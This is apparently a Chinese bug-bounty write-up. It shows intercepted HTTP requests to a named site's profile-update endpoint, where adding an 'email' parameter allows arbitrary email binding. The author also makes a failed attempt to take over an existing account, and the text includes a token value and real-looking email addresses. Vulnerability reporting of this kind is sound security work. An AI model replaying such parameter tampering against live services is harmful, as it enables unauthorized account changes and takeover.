1、打开Url:https://ori.cmcm.com/user/index.html

image_1cjpv7jc01c2762q6vm19d3o9.png-149kB

2、点击保存并且抓包,抓取的数据包如下

1
POST /user/updateoneruserinfo.html HTTP/1.1
2
Host: ori.cmcm.com
3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4
Accept: application/json, text/javascript, */*; q=0.01
5
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
6
Accept-Encoding: gzip, deflate
7
DNT: 1
8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
9
X-Requested-With: XMLHttpRequest
10
Referer: https://ori.cmcm.com/user/index.html
11
Content-Length: 134
12
Cookie: 这是一个马赛克
13
Connection: close
14
15
skype=soory%2Cnull&timezone=Asia%2FShanghai&country=CN&surname=free&name=only&cm_token=ec622cd7baffb66839d657bd39d563c3211533098840827

然后来fuzz一下,加上email参数后,数据包如下

1
POST /user/updateoneruserinfo.html HTTP/1.1
2
Host: ori.cmcm.com
3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4
Accept: application/json, text/javascript, */*; q=0.01
5
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
6
Accept-Encoding: gzip, deflate
7
DNT: 1
8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
9
X-Requested-With: XMLHttpRequest
10
Referer: https://ori.cmcm.com/user/index.html
11
Content-Length: 134
12
Cookie: 这是马赛克
13
Connection: close
14
15
skype=soory%2Cnull&timezone=Asia%2FShanghai&country=CN&surname=free&name=only&cm_token=ec622cd7baffb66839d657bd39d563c3211533098840827&email=only_free@qq.com

image_1cjpvg8lp12co1kjs1hcfve81si9m.png-120.6kB

ok,这里存在任意邮箱绑定,那么我们来绑定一个存在的用户的邮箱来尝试下看看能不能修改存在邮箱的账号

3、注册一个邮箱账号

image_1cjpvk4r3mo21fk0ejn1ncaguf1j.png-88kB

注册好后登陆进去

image_1cjpvmnoqv7qr1q1hdsv4e13ra20.png-96.5kB

4、在2017614104@qq.com的账号处吧邮箱改成1900065568@qq.com

image_1cjq07p4c1h5u104pjeuj641s0h2t.png-140.9kB

我去,这里有过滤。。

来试试看看能不能绕过

image_1cjq09kd3fdn40h17i91ve8bf93a.png-162.9kB

好吧,绕不过,难受了,只能当任意邮箱绑定提交了(泪奔.png)